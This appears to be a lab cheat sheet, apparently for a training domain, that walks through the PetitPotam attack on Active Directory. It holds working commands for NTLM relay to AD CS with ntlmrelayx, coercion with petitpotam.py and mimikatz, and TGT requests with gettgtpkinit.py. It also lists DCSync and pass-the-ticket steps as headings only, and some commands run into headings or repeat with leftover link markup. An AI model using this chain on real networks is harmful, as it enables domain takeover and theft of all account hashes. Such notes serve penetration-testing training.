PetitPotam (MS-EFSRPC) (without authentication to the domain)
Start NTLM hash capture tool
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainControllerMETHOD1: Run petitpotam.py tool (In another terminal of linux)
python3 petitpotam.py <attack_host_ip> <DC_host_ip>METHOD2: Run mimikatz tool (In another session of windows)
mimikatz tool (In another session of windows) .\mimikatz.exe "Misc::efs /server:<DC_IP> /connect:<attack_host>" exitMETHOD3: Alternate of petitpotam.py (powershell implementation)
Capture Cache base64 encoded certificate for DC01
sudo ntlmrelayx.py -debug -smb2support --target [http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp](http://academy-ea-ca01.inlanefreight.local/certsrv/certfnsh.asp) --adcs --template DomainControllerRequesting a TGT using gettgtpkinit.py
python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 <cache_base64_certificate> dc01.ccacheSetting up KRB5CCNAME environment variable
export KRB5CCNAME=dc01.ccacheUse DC TGT to DCSync (extract all the NTLM passwords)
Check out TGT in memory
Confirm admin access to the DC
Request for NT hashes using TGT ticket
Perform DCSync attack using DC NTLM hash
Requesting TGT and perform PTT (pass-the-ticket) with DC
Perform the DCSync attack with Mimikatz
PetitPotam mitigations
Last updated